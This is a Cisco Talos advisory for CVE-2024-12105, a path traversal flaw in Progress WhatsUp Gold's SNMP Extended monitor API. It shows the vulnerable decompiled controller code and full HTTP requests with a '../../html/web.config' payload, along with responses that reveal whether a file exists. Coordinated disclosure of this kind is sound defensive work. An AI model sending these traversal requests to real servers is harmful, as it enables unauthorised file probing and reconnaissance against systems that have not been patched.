CVE-2024-12105
A path traversal vulnerability exists in the handling of SnmpExtendedActiveMonitor requests in Progress WhatsUp Gold 24.0.1 Build 2177, Total Plus Edition. A specially crafted HTTP request can lead to information disclosure. An attacker can trigger this vulnerability by making an authenticated HTTP request.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Progress Software Corporation WhatsUp Gold WhatsUp Gold 24.0.1 Build 2177 , Total Plus Edition
WhatsUp Gold - https://www.whatsupgold.com/
6.5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
WhatsUp Gold is a network monitoring and management software developed by Progress, a global software company. WhatsUp Gold is designed to provide visibility into IT infrastructure, allowing organizations to monitor the performance and health of networks, devices, servers, applications, and other critical components. It offers features such as network mapping, performance monitoring, alerting, and reporting to help IT professionals ensure the optimal functioning of their network infrastructure.
The vulnerablity is related to SNMP Extended Active Monitor functionality. Unlike a standard SNMP monitor, which evaluates a single OID against a single threshold, the SNMP Extended monitor evaluates multiple OIDs against several thresholds by using an XML file with predefined values.
To turn on this functionality, an authenticated user needs to perform the following action:
Admin -> Monitors -> Action -> New -> SNMP Extended Monitor
Let us take a look at controler implementation responsible for handling this action:
Line 1 // Controler
Line 2
Line 3 //WhatsUp.UI\WhatsUp\UI\Areas\Platform\ApiControllers\Monitors\Active\SnmpExtendedActiveMonitorController.cs
Line 4 [HttpGet]
Line 5 public HttpResponseMessage Action(string xmlFileName)
Line 6 {
Line 7 return this.GetResponse<IEnumerable<SnmpParameter>>((Func<IEnumerable<SnmpParameter>>) (() => this.SnmpImportWrapper.Import(xmlFileName)));
Line 8 }
Line 10 Implementation
Line 11 // Ipswitch.WhatsUp.Application\Ipswitch\WhatsUp\Application\SnmpImportWrapper.cs
Line 12
Line 13 public IEnumerable<SnmpParameter> Import(string xmlName)
Line 14 {
Line 15 if (!(new XmlSerializer(typeof (SnmpParameterResult)).Deserialize((TextReader) File.OpenText(Path.Combine(this.GetXmlDirectory(), xmlName))) is SnmpParameterResult snmpParameterResult))
Line 16 return (IEnumerable<SnmpParameter>) new SnmpParameter[0];
Line 17 foreach (SnmpParameter parameter in snmpParameterResult.Parameters)
Line 18 {
Line 19 if (!string.IsNullOrWhiteSpace(((SnmpParameterBase) parameter).OID))
Line 20 {
Line 21 string description = this._mibProvider.GetDescription(((SnmpParameterBase) parameter).OID);
Line 22 if (!string.IsNullOrWhiteSpace(description))
Line 23 ((SnmpParameterBase) parameter).LongDescription = description;
Line 24 }
Line 25 }
Line 26 return (IEnumerable<SnmpParameter>) snmpParameterResult.Parameters;
Line 27 }
Apparent from the above is that the xmlName argument is fully controlled by an attacker and is used in File.OpenText function argument at line 15.
We can also observe that there is no path traversal protection implemented and directly controlled xmlName value is just combined with usage of Path.Combine function line 15.
Such conditions allows the attacker to conduct path traversal attack and check an existence of any file within the file system.
REQ
GET /NmConsole/api/core/snmpextendedactivemonitor?xmlFileName=../../html/web.config HTTP/2
Host: 172.18.234.223
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: application/json
Cookie: ASP.NET_SessionId=42dbityo2emfybcisjvcollh; langid=1033; .ASPXAUTH=F417BA017E46946465A67C92ACA0B8F7BC9467A2EE280F1D8A4F64FD8DF73397225782C6F6B5C4D9E1E1C3625DBC53AD54D3C770B8B25F74AEBF1A83A658583221B1A5A9667A754D876F2F460D7FF570026F63E89F60EF18CC91E5F739858E0D
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://172.18.234.223/NmConsole/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
RESP when file EXISTS
HTTP/2 500 Internal Server Error
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
Set-Cookie: langid=1033; path=/; secure; HttpOnly
X-Aspnet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Xss-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Thu, 03 Oct 2024 13:47:40 GMT
Content-Length: 55
{"Message":"There is an error in XML document (2, 2)."}
Example when file DOES NOT exists
REQ
GET /NmConsole/api/core/snmpextendedactivemonitor?xmlFileName=XXX HTTP/2
Host: 172.18.234.223
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: application/json
Cookie: ASP.NET_SessionId=42dbityo2emfybcisjvcollh; langid=1033; .ASPXAUTH=95435CCFAB2556821129119B8C55992247BE2D11CA65FDA9409BC8980A12AA3E9CDF151A91D86C987330A210FD1F003F580E7A900B625C00258550CC07BFB26EE1812468080130F8C4BFE741B9929CC7818F6E3189214104952D7FE93A2FDD09
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://172.18.234.223/NmConsole/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
RESP
HTTP/2 500 Internal Server Error
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
Set-Cookie: langid=1033; path=/; secure; HttpOnly
X-Aspnet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Xss-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Thu, 03 Oct 2024 15:22:08 GMT
Content-Length: 104
{"Message":"Could not find file 'C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\Data\\SNMPExtended\\XXX'."}
2024-11-13 - Vendor Disclosure
2024-12-09 - Vendor Patch Release
2025-01-08 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.